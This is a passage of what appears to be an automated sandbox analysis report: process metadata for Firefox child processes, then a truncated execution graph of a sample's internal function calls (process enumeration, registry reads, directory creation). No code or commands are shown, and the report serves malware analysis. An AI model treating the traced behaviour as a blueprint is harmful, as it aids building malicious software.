                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                  Start time:12:29:36
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:14.6%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                                    Signature Coverage:64.7%
                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                    Total number of Limit Nodes:156
                                                                                                                                                                                    execution_graph 69513 4d30390 69514 4d303ad Process32NextW 69513->69514 69516 4d3043a 69514->69516 69517 4d9053f 69518 4d9048c 69517->69518 69519 4d904b1 Process32FirstW 69518->69519 69520 4d904cf 69518->69520 69519->69520 69521 7db80 69543 7dbc2 69521->69543 69522 7eea6 70040 70360 69522->70040 69526 7eeec 70089 93910 69526->70089 69528 7eef8 69529 99ec0 4 API calls 69528->69529 69532 93910 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69532->69543 69533 93510 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69533->69543 69535 58570 17 API calls 69535->69543 69536 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69536->69543 69537 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69537->69543 69542 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69542->69543 69543->69522 69543->69532 69543->69533 69543->69535 69543->69536 69543->69537 69543->69542 69545 7f0b0 15 API calls 69543->69545 69546 54730 69543->69546 69609 55a90 69543->69609 69747 5a760 69543->69747 69811 5ba60 69543->69811 69954 61010 69543->69954 70069 a1220 15 API calls 2 library calls 69543->70069 70070 92640 16 API calls 69543->70070 69545->69543 70126 97810 69546->70126 69551 99ec0 4 API calls 69552 547f8 __fread_nolock 69551->69552 69552->69552 69553 55a27 69552->69553 70149 9d850 69552->70149 70406 32040 69553->70406 69556 548af 69557 54d64 69556->69557 69558 548e1 69556->69558 70376 a2a00 69557->70376 70164 95e10 69558->70164 69563 548f2 70181 50780 69563->70181 71465 93c80 69609->71465 69612 93c50 4 API calls 69613 55b0e 69612->69613 69614 99ec0 4 API calls 69613->69614 69615 55b45 __fread_nolock 69614->69615 71468 99c10 69615->71468 69618 55db5 69621 32700 4 API calls 69618->69621 69619 55bca 69620 95e10 4 API calls 69619->69620 69622 55bdb 69620->69622 69623 55dc5 69621->69623 69624 50780 15 API calls 69622->69624 71579 94ab0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69623->71579 69626 55bea 69624->69626 69629 55c00 69626->69629 69682 55c1d 69626->69682 69627 55dd8 69628 32660 3 API calls 69627->69628 69633 55db3 69628->69633 69630 98000 5 API calls 69629->69630 69631 55c05 69630->69631 69635 98000 5 API calls 69631->69635 69632 55e25 69641 99b50 4 API calls 69632->69641 69633->69632 69636 32700 4 API calls 69633->69636 69634 55da4 69638 98000 5 API calls 69634->69638 69637 55e03 69636->69637 69638->69633 69659 50780 15 API calls 69659->69682 69661 32660 3 API calls 69661->69682 69671 98000 5 API calls 69671->69682 69682->69634 69682->69659 69682->69661 69682->69671 71476 99b50 69682->71476 71484 99d70 69682->71484 71578 94b10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69682->71578 69748 97810 4 API calls 69747->69748 69749 5a7ba 69748->69749 69750 93c50 4 API calls 69749->69750 69751 5a7e2 69750->69751 69752 99ec0 4 API calls 69751->69752 69753 5a81d __fread_nolock 69752->69753 69753->69753 69754 5b9f1 69753->69754 69755 9d850 4 API calls 69753->69755 69756 32040 4 API calls 69754->69756 69757 5a8e2 69755->69757 69784 5a95e 69756->69784 69758 5a914 69757->69758 69759 5ad8b 69757->69759 69761 95e10 4 API calls 69758->69761 69762 a2a00 4 API calls 69759->69762 69760 112350 3 API calls 69763 5b9fb 69760->69763 69764 5a925 69761->69764 69774 5ad89 69762->69774 69766 32700 4 API calls 69763->69766 69765 50780 15 API calls 69764->69765 69767 5a930 69765->69767 69768 5ba12 69766->69768 69769 5a956 69767->69769 69793 5aa15 69767->69793 69770 99c70 4 API calls 69768->69770 69771 98000 5 API calls 69769->69771 69777 5ba27 69770->69777 69771->69784 69772 5b95d 69778 98000 5 API calls 69772->69778 69773 5ad7a 69776 98000 5 API calls 69773->69776 69775 a2a00 4 API calls 69774->69775 69774->69784 69810 5ae4b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z std::_Locinfo::_Locinfo_ctor 69774->69810 69775->69810 69776->69774 69779 38920 4 API calls 69777->69779 69778->69784 69780 5ba3f Concurrency::cancel_current_task 69779->69780 69781 5aa10 69781->69543 69782 93c50 4 API calls 69782->69810 69783 9d850 4 API calls 69783->69793 69784->69760 69784->69781 69785 95b90 4 API calls 69785->69793 69786 50780 15 API calls 69786->69793 69787 98000 5 API calls 69787->69793 69788 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69788->69810 69789 9d660 4 API calls 69789->69810 69790 95e10 4 API calls 69790->69793 69791 9bc40 4 API calls 69791->69810 69793->69754 69793->69773 69793->69783 69793->69784 69793->69785 69793->69786 69793->69787 69793->69790 72205 a2b20 4 API calls 3 library calls 69793->72205 69794 44540 14 API calls 69794->69810 69795 f27b0 3 API calls 69795->69810 69796 44970 10 API calls 69796->69810 69797 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 69797->69810 69798 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69798->69810 69801 cbfb0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 69801->69810 69802 bda80 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 69802->69810 69803 10ce31 std::_Facet_Register 4 API calls 69803->69810 69804 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69804->69810 69805 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69805->69810 69808 93510 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69808->69810 69809 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69809->69810 69810->69754 69810->69763 69810->69772 69810->69782 69810->69784 69810->69788 69810->69789 69810->69791 69810->69794 69810->69795 69810->69796 69810->69797 69810->69798 69810->69801 69810->69802 69810->69803 69810->69804 69810->69805 69810->69808 69810->69809 72206 11a9d6 69810->72206 72212 9cfd0 69810->72212 72222 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 69810->72222 72223 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 69810->72223 69812 93c80 4 API calls 69811->69812 69813 5bab3 69812->69813 69814 93c50 4 API calls 69813->69814 69815 5badd 69814->69815 69816 99ec0 4 API calls 69815->69816 69817 5bb09 __fread_nolock 69816->69817 69818 99c10 4 API calls 69817->69818 69819 5bb61 69818->69819 69820 5bb94 69819->69820 69821 5bf2e 69819->69821 69822 95e10 4 API calls 69820->69822 69823 32700 4 API calls 69821->69823 69824 5bba5 69822->69824 69825 5bf3e 69823->69825 69826 50780 15 API calls 69824->69826 72265 94ab0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69825->72265 69829 5bbb0 69826->69829 69828 5bf54 69830 32660 3 API calls 69828->69830 69832 5bbc3 69829->69832 69900 5bbfb 69829->69900 69831 5bf2c 69830->69831 69834 32700 4 API calls 69831->69834 69839 5bfbc 69831->69839 69833 98000 5 API calls 69832->69833 69836 5bbc8 69833->69836 69838 5bf97 69834->69838 69835 98000 5 API calls 69835->69831 69837 98000 5 API calls 69836->69837 69840 5bbd3 69837->69840 72266 94ab0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69838->72266 69842 5ddf4 69839->69842 69846 9d850 4 API calls 69839->69846 69843 32660 3 API calls 69840->69843 69844 32040 4 API calls 69842->69844 69847 5bbde 69843->69847 69848 5ddf9 69844->69848 69845 5bfad 69849 32660 3 API calls 69845->69849 69850 5c01d 69846->69850 69851 32660 3 API calls 69847->69851 69852 112350 3 API calls 69848->69852 69849->69839 69853 9bc40 4 API calls 69850->69853 69856 5c052 std::_Locinfo::_Locinfo_ctor 69850->69856 69855 5ddfe 69852->69855 69853->69856 69860 3bf00 7 API calls 69856->69860 69858 99b50 4 API calls 69858->69900 69868 5c0dd 69860->69868 69864 99d70 4 API calls 69864->69900 69868->69848 69870 50780 15 API calls 69870->69900 69876 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 69876->69900 69888 98000 5 API calls 69888->69900 69890 5bf1d 69890->69835 69898 95e10 4 API calls 69898->69900 69900->69858 69900->69864 69900->69870 69900->69876 69900->69888 69900->69890 69900->69898 72256 99bb0 69900->72256 72264 a2b20 4 API calls 3 library calls 69900->72264 69955 6108f __fread_nolock 69954->69955 69955->69955 69956 62a32 69955->69956 69958 9d850 4 API calls 69955->69958 69957 32040 4 API calls 69956->69957 69989 61181 69957->69989 69959 610ff 69958->69959 69961 61136 69959->69961 69962 615ba 69959->69962 69960 112350 3 API calls 69964 62a3c 69960->69964 69965 95e10 4 API calls 69961->69965 69963 a2a00 4 API calls 69962->69963 69973 615b5 69963->69973 69967 32040 4 API calls 69964->69967 69966 61147 69965->69966 69968 50780 15 API calls 69966->69968 69969 62a41 69967->69969 69971 61153 69968->69971 69970 112350 3 API calls 69969->69970 69972 62a46 69970->69972 69974 61179 69971->69974 70015 61238 69971->70015 72406 993d0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69972->72406 69979 a2a00 4 API calls 69973->69979 69981 61674 69973->69981 69973->69989 69976 98000 5 API calls 69974->69976 69976->69989 69977 615a9 69980 98000 5 API calls 69977->69980 69979->69981 69980->69973 69981->69964 69981->69981 69987 9d850 4 API calls 69981->69987 69981->69989 69984 61233 69984->69543 69986 9d850 4 API calls 69986->70015 69990 617a7 69987->69990 69989->69960 69989->69984 69992 3b8e0 9 API calls 69990->69992 69991 95b90 4 API calls 69991->70015 69994 617bb 69992->69994 69998 9a250 5 API calls 69994->69998 70039 61970 69994->70039 69996 50780 15 API calls 69996->70015 69999 61816 69998->69999 70006 99ec0 4 API calls 69999->70006 70002 98000 5 API calls 70002->69989 70003 98000 5 API calls 70003->70015 70004 6290a 70004->69989 70004->70002 70009 61854 70006->70009 70008 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70008->70039 70010 99ec0 4 API calls 70009->70010 70009->70039 70011 61894 70010->70011 70016 99ec0 4 API calls 70011->70016 70012 95e10 4 API calls 70012->70015 70014 3b8e0 9 API calls 70014->70039 70015->69956 70015->69977 70015->69986 70015->69989 70015->69991 70015->69996 70015->70003 70015->70012 72398 a2b20 4 API calls 3 library calls 70015->72398 70017 618d4 70016->70017 70018 99ec0 4 API calls 70017->70018 70017->70039 70020 61914 70018->70020 70019 9a250 5 API calls 70019->70039 70026 9d660 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70026->70039 70027 95b20 4 API calls 70027->70039 70029 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70029->70039 70030 50780 15 API calls 70030->70039 70031 98000 5 API calls 70031->70039 70034 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70034->70039 70037 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70037->70039 70039->69956 70039->69969 70039->69972 70039->69989 70039->70004 70039->70008 70039->70014 70039->70019 70039->70026 70039->70027 70039->70029 70039->70030 70039->70031 70039->70034 70039->70037 72274 60890 70039->72274 72401 9a000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 70039->72401 72402 32540 5 API calls std::_Locinfo::_Locinfo_ctor 70039->72402 72403 959f0 4 API calls 3 library calls 70039->72403 72404 a1b00 16 API calls 70039->72404 72405 92640 16 API calls 70039->72405 70041 93c80 4 API calls 70040->70041 70042 703ac 70041->70042 70043 93c50 4 API calls 70042->70043 70044 703df 70043->70044 70045 99ec0 4 API calls 70044->70045 70068 70407 __fread_nolock 70045->70068 70046 7044c RegOpenKeyExA 70046->70068 70047 711de 70071 99ec0 70047->70071 70048 95c30 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70048->70068 70049 4ffc0 5 API calls 70049->70068 70050 711f7 70052 32700 4 API calls 70050->70052 70051 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70051->70068 70053 7120e 70052->70053 70054 99c70 4 API calls 70053->70054 70055 71223 70054->70055 70056 38920 4 API calls 70055->70056 70057 7123b Concurrency::cancel_current_task 70056->70057 70058 112350 3 API calls 70057->70058 70059 71254 70058->70059 70060 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70060->70068 70061 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 70061->70068 70062 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70062->70068 70063 9cfd0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70063->70068 70064 99ec0 4 API calls 70064->70068 70067 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 70067->70068 70068->70046 70068->70047 70068->70048 70068->70049 70068->70050 70068->70051 70068->70057 70068->70060 70068->70061 70068->70062 70068->70063 70068->70064 70068->70067 72853 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 70068->72853 72854 327b0 ExitProcess RtlAllocateHeap RtlFreeHeap 70068->72854 70069->69543 70070->69543 70072 99ef8 70071->70072 70073 99f05 70071->70073 70074 97810 4 API calls 70072->70074 70075 99f1a 70073->70075 70076 99fae 70073->70076 70074->70073 70078 32830 4 API calls 70075->70078 70077 32700 4 API calls 70076->70077 70079 99fbe 70077->70079 70080 99f53 70078->70080 70081 99c70 4 API calls 70079->70081 70082 9cfd0 4 API calls 70080->70082 70083 99fd3 70081->70083 70084 99f65 Concurrency::cancel_current_task 70082->70084 70085 38920 4 API calls 70083->70085 70086 99f8d 70084->70086 70087 112350 3 API calls 70084->70087 70085->70084 70086->69526 70088 99ffe 70087->70088 70090 9394f 70089->70090 70117 939b3 std::_Locinfo::_Locinfo_ctor 70089->70117 70091 93a0f 70090->70091 70092 93b35 70090->70092 70093 93956 70090->70093 70094 93ac6 70090->70094 70090->70117 70097 10ce31 std::_Facet_Register 4 API calls 70091->70097 70095 10ce31 std::_Facet_Register 4 API calls 70092->70095 70098 10ce31 std::_Facet_Register 4 API calls 70093->70098 70096 10ce31 std::_Facet_Register 4 API calls 70094->70096 70117->69528 70127 97973 70126->70127 70128 97852 70126->70128 70137 32700 4 API calls 70127->70137 70145 5478a 70127->70145 70129 97859 70128->70129 70130 978b5 70128->70130 70131 978d7 70128->70131 70132 97917 70128->70132 70128->70145 70433 10ce31 70129->70433 70136 10ce31 std::_Facet_Register 4 API calls 70130->70136 70133 10ce31 std::_Facet_Register 4 API calls 70131->70133 70134 10ce31 std::_Facet_Register 4 API calls 70132->70134 70138 978de 70133->70138 70134->70145 70136->70145 70140 9798e 70137->70140 70441 32830 70138->70441 70139 97860 70143 10ce31 std::_Facet_Register 4 API calls 70139->70143 70457 38ce0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap ___std_exception_copy 70140->70457 70143->70145 70144 979a1 Concurrency::cancel_current_task 70146 93c50 70145->70146 70484 97b50 70146->70484 70150 9d883 70149->70150 70155 9d8ae std::_Locinfo::_Locinfo_ctor 70149->70155 70151 9d890 70150->70151 70152 9d8dc 70150->70152 70153 9d8d3 70150->70153 70156 10ce31 std::_Facet_Register 4 API calls 70151->70156 70152->70155 70157 10ce31 std::_Facet_Register 4 API calls 70152->70157 70153->70151 70154 9d92d 70153->70154 70519 31fa0 4 API calls 2 library calls 70154->70519 70155->69556 70158 9d8a3 70156->70158 70157->70155 70158->70155 70160 112350 3 API calls 70158->70160 70161 9d937 70160->70161 70162 11b376 __freea 2 API calls 70161->70162 70163 9d954 70162->70163 70163->69556 70165 95e3a 70164->70165 70166 95e4b 70165->70166 70167 95ef2 70165->70167 70168 95e57 std::_Locinfo::_Locinfo_ctor 70166->70168 70170 95e7c 70166->70170 70172 95ebe 70166->70172 70173 95eb5 70166->70173 70169 32040 4 API calls 70167->70169 70168->69563 70171 95ef7 70169->70171 70175 10ce31 std::_Facet_Register 4 API calls 70170->70175 70520 31fa0 4 API calls 2 library calls 70171->70520 70178 10ce31 std::_Facet_Register 4 API calls 70172->70178 70179 95e96 std::_Locinfo::_Locinfo_ctor 70172->70179 70173->70170 70173->70171 70176 95e8f 70175->70176 70176->70179 70178->70179 70179->69563 70377 a2b18 70376->70377 70378 a2a4d 70376->70378 70379 32b90 4 API calls 70377->70379 71410 9eb90 70378->71410 70380 a2b1d 70379->70380 71438 10b28b 4 API calls 2 library calls 70406->71438 70436 10ce36 std::_Facet_Register 70433->70436 70435 10ce50 70435->70139 70436->70435 70438 31fa0 Concurrency::cancel_current_task 70436->70438 70458 11bacc 70436->70458 70437 10ce5c 70437->70437 70438->70437 70464 10e1f1 70438->70464 70442 32846 70441->70442 70443 328f5 70441->70443 70445 32852 std::_Locinfo::_Locinfo_ctor 70442->70445 70446 3287a 70442->70446 70449 328b5 70442->70449 70450 328be 70442->70450 70444 32040 4 API calls 70443->70444 70447 328fa 70444->70447 70445->70145 70451 10ce31 std::_Facet_Register 4 API calls 70446->70451 70483 31fa0 4 API calls 2 library calls 70447->70483 70449->70446 70449->70447 70454 10ce31 std::_Facet_Register 4 API calls 70450->70454 70455 32896 std::_Locinfo::_Locinfo_ctor 70450->70455 70452 3288d 70451->70452 70453 112350 3 API calls 70452->70453 70452->70455 70456 32904 70453->70456 70454->70455 70455->70145 70457->70144 70463 1249cd __dosmaperr std::_Facet_Register 70458->70463 70459 124a0b 70472 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 70459->70472 70461 1249f6 RtlAllocateHeap 70462 124a09 70461->70462 70461->70463 70462->70436 70463->70459 70463->70461 70465 10e1fe 70464->70465 70471 31fe3 70464->70471 70466 11bacc ___std_exception_copy 3 API calls 70465->70466 70465->70471 70467 10e21b 70466->70467 70468 10e22b 70467->70468 70473 123258 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock __dosmaperr 70467->70473 70474 11b376 70468->70474 70471->70139 70472->70462 70473->70468 70477 124953 70474->70477 70478 12495e RtlFreeHeap 70477->70478 70481 11b38e 70477->70481 70479 124973 __dosmaperr 70478->70479 70478->70481 70482 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 70479->70482 70481->70471 70482->70481 70483->70452 70487 97b8a 70484->70487 70485 10ce31 std::_Facet_Register 4 API calls 70486 97bc0 70485->70486 70488 547af 70486->70488 70489 97ca9 70486->70489 70490 97c13 70486->70490 70487->70485 70488->69551 70514 32b90 70489->70514 70496 99540 70490->70496 70494 97c19 70494->70488 70495 93910 4 API calls 70494->70495 70495->70494 70497 9954d 70496->70497 70498 99591 70496->70498 70500 99557 70497->70500 70502 9957a 70497->70502 70517 31fa0 4 API calls 2 library calls 70498->70517 70500->70498 70504 9955e 70500->70504 70501 9958b 70501->70494 70502->70501 70505 10ce31 std::_Facet_Register 4 API calls 70502->70505 70503 99564 70506 112350 3 API calls 70503->70506 70510 9956d 70503->70510 70507 10ce31 std::_Facet_Register 4 API calls 70504->70507 70508 99584 70505->70508 70509 9959b 70506->70509 70507->70503 70508->70494 70511 995c4 70509->70511 70512 112350 3 API calls 70509->70512 70510->70494 70511->70494 70513 995d9 70512->70513 70518 10b28b 4 API calls 2 library calls 70514->70518 70517->70503 70519->70158 70520->70176 71411 9eb9d 71410->71411 71412 9ebe4 71410->71412 71414 9ebaa 71411->71414 71415 9ebcd 71411->71415 71436 31fa0 4 API calls 2 library calls 71412->71436 71414->71412 71416 9ebb1 71414->71416 71417 9ebde 71415->71417 71420 10ce31 std::_Facet_Register 4 API calls 71415->71420 71418 9ebb7 71436->71418 71466 97810 4 API calls 71465->71466 71467 55ae3 71466->71467 71467->69612 71469 99c25 71468->71469 71469->71469 71470 99c5f 71469->71470 71471 99c3f 71469->71471 71472 32040 4 API calls 71470->71472 71473 9d850 4 API calls 71471->71473 71474 99c64 71472->71474 71475 55b9d 71473->71475 71475->69618 71475->69619 71477 99b70 71476->71477 71477->71477 71478 99b85 71477->71478 71479 99ba6 71477->71479 71485 95b90 4 API calls 71484->71485 71486 99d86 71485->71486 71486->69682 71578->69682 71579->69627 72205->69793 72207 11a9ea __fread_nolock 72206->72207 72224 1175da 72207->72224 72209 11aa04 72210 11207c __fread_nolock 3 API calls 72209->72210 72213 9d011 72212->72213 72214 9d05a 72213->72214 72215 9d0ff 72213->72215 72221 9d0c8 72213->72221 72217 10ce31 std::_Facet_Register 4 API calls 72214->72217 72255 37d60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72215->72255 72219 9d074 72217->72219 72218 9d104 72220 97810 4 API calls 72219->72220 72220->72221 72221->69810 72222->69810 72223->69810 72240 116559 72224->72240 72226 117635 72229 11765a 72226->72229 72248 1178b0 4 API calls 2 library calls 72226->72248 72227 117602 72247 1122c3 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock __Getctype 72227->72247 72228 1175ed 72228->72226 72228->72227 72233 11761d 72228->72233 72249 116574 4 API calls 2 library calls 72229->72249 72233->72209 72241 116571 72240->72241 72242 11655e 72240->72242 72241->72228 72253 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 72242->72253 72244 116563 72254 112340 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock 72244->72254 72246 11656e 72246->72228 72247->72233 72248->72229 72253->72244 72254->72246 72255->72218 72257 95b20 4 API calls 72256->72257 72258 99bc6 72257->72258 72258->69900 72264->69900 72265->69828 72266->69845 72275 95e10 4 API calls 72274->72275 72276 60900 72275->72276 72277 3b8e0 9 API calls 72276->72277 72278 6090b 72277->72278 72279 10bc3e std::locale::_Init 4 API calls 72278->72279 72280 60983 72279->72280 72407 991d0 72280->72407 72398->70015 72401->70039 72402->70039 72403->70039 72405->70039 72409 99203 std::_Lockit::~_Lockit std::_Lockit::_Lockit 72407->72409 72853->70068 72854->70068 72857 8d180 72984 72250 72857->72984 72859 8d1e1 72859->72859 72860 8d238 72859->72860 72861 8ebd6 72859->72861 72862 9d850 4 API calls 72860->72862 72863 32040 4 API calls 72861->72863 72864 8d261 CreateDirectoryA 72862->72864 72865 8ebdb 72863->72865 72871 8de0f 72864->72871 72945 8d28c std::_Locinfo::_Locinfo_ctor __Mtx_unlock 72864->72945 72866 32040 4 API calls 72865->72866 72867 8ebe0 72866->72867 72870 112350 3 API calls 72867->72870 72868 8ea99 72869 8dde1 72872 95e10 4 API calls 72869->72872 72873 8ebe5 72870->72873 72874 8ea5f 72871->72874 72879 8de78 72871->72879 72880 8ec20 72871->72880 72885 8ddf2 72872->72885 74497 10c05c 8 API calls 2 library calls 72873->74497 72874->72868 72876 112350 3 API calls 72874->72876 72900 8ec74 72876->72900 72877 8ebeb 72878 32040 4 API calls 72877->72878 72881 8ebf0 72878->72881 72883 9d850 4 API calls 72879->72883 72882 32040 4 API calls 72880->72882 72887 112350 3 API calls 72881->72887 72888 8ec25 72882->72888 72889 8dea1 CreateDirectoryA 72883->72889 72884 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72884->72945 72885->72871 73573 3c050 72885->73573 72890 8ebf5 72887->72890 72891 32040 4 API calls 72888->72891 72902 8ea2c 72889->72902 72932 8dec6 std::_Locinfo::_Locinfo_ctor __Mtx_unlock 72889->72932 74498 10c05c 8 API calls 2 library calls 72890->74498 72893 8ec2a 72891->72893 72895 112350 3 API calls 72893->72895 72894 8ebfb 72899 32040 4 API calls 72894->72899 72901 8ec2f 72895->72901 72896 8ee15 72909 8eff2 72896->72909 72910 8ee66 72896->72910 72897 8e9fe 72898 95e10 4 API calls 72897->72898 72904 8ea0f 72898->72904 72905 8ec00 72899->72905 72900->72896 72906 8ed1a 72900->72906 72907 8efe3 72900->72907 74501 10c05c 8 API calls 2 library calls 72901->74501 72902->72874 72903 112350 3 API calls 72902->72903 72903->72874 73598 413c0 72904->73598 72912 112350 3 API calls 72905->72912 72914 9d850 4 API calls 72906->72914 72913 32040 4 API calls 72907->72913 72922 32040 4 API calls 72909->72922 72916 9d850 4 API calls 72910->72916 72918 8ec05 72912->72918 72919 8efe8 72913->72919 72920 8ed40 72914->72920 72915 8ec35 72921 32040 4 API calls 72915->72921 72924 8ee8c 72916->72924 74499 10c05c 8 API calls 2 library calls 72918->74499 72927 112350 3 API calls 72919->72927 72928 8ed7e 72920->72928 74505 a10f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72920->74505 72929 8ec3a 72921->72929 72923 8ee9e 72922->72923 72930 112350 3 API calls 72923->72930 72957 8eed0 72923->72957 72931 95e10 4 API calls 72924->72931 72925 95b90 4 API calls 72925->72945 72936 8efed 72927->72936 74506 3c820 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap __freea ___std_exception_copy 72928->74506 72937 112350 3 API calls 72929->72937 72938 8effc 72930->72938 72931->72923 72932->72888 72932->72893 72932->72897 72932->72901 72932->72915 72932->72929 72942 8ec3f 72932->72942 72948 8ec45 72932->72948 72953 8ec4a 72932->72953 72956 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72932->72956 72959 8ec4f 72932->72959 72961 95b90 4 API calls 72932->72961 72962 8ec55 72932->72962 72964 8ec5a 72932->72964 72966 8ec5f 72932->72966 72968 8ec65 72932->72968 72975 9bc40 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72932->72975 72976 32830 4 API calls 72932->72976 72978 9d660 4 API calls 72932->72978 72980 10c3b3 GetSystemTimePreciseAsFileTime 72932->72980 72982 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72932->72982 72983 3f050 14 API calls 72932->72983 74496 959f0 4 API calls 3 library calls 72932->74496 72935 8ec0b 72939 112350 3 API calls 72935->72939 72940 112350 3 API calls 72936->72940 72937->72942 72946 8ec10 72939->72946 72940->72909 74502 10c05c 8 API calls 2 library calls 72942->74502 72943 8edaa 72943->72919 72947 8eddd 72943->72947 72945->72865 72945->72867 72945->72869 72945->72873 72945->72877 72945->72881 72945->72884 72945->72890 72945->72894 72945->72905 72945->72918 72945->72925 72945->72935 72945->72946 72951 8ec15 72945->72951 72954 8ec1b 72945->72954 72970 32830 4 API calls 72945->72970 72971 9bc40 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72945->72971 72972 10c3b3 GetSystemTimePreciseAsFileTime 72945->72972 72973 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 72945->72973 72974 9d660 4 API calls 72945->72974 74324 959f0 4 API calls 3 library calls 72945->74324 74325 3f050 72945->74325 72949 32040 4 API calls 72946->72949 72947->72896 72947->72936 72950 32040 4 API calls 72948->72950 72949->72951 72950->72953 74500 10c05c 8 API calls 2 library calls 72951->74500 72955 112350 3 API calls 72953->72955 72958 112350 3 API calls 72954->72958 72955->72959 72956->72932 72958->72880 74503 10c05c 8 API calls 2 library calls 72959->74503 72961->72932 72963 112350 3 API calls 72962->72963 72963->72964 72965 32040 4 API calls 72964->72965 72965->72966 74504 10c05c 8 API calls 2 library calls 72966->74504 72969 112350 3 API calls 72968->72969 72969->72902 72970->72945 72971->72945 72972->72945 72973->72945 72974->72945 72975->72932 72976->72932 72978->72932 72980->72932 72982->72932 72983->72932 72985 72272 72984->72985 72986 99b50 4 API calls 72985->72986 72987 72620 72985->72987 72989 722cd 72986->72989 72990 99b50 4 API calls 72987->72990 72991 73b3e 72987->72991 72988 74f1f 72988->72859 72995 722de CreateDirectoryA 72989->72995 72992 72655 72990->72992 72993 99b50 4 API calls 72991->72993 72994 74cf6 72991->72994 73000 7266a CreateDirectoryA 72992->73000 72996 73b8f 72993->72996 72994->72988 72997 99b50 4 API calls 72994->72997 72998 7260e 72995->72998 72999 722ea 72995->72999 73004 73ba4 CreateDirectoryA 72996->73004 73001 74d29 72997->73001 73005 32660 3 API calls 72998->73005 73011 99b50 4 API calls 72999->73011 73002 72677 73000->73002 73003 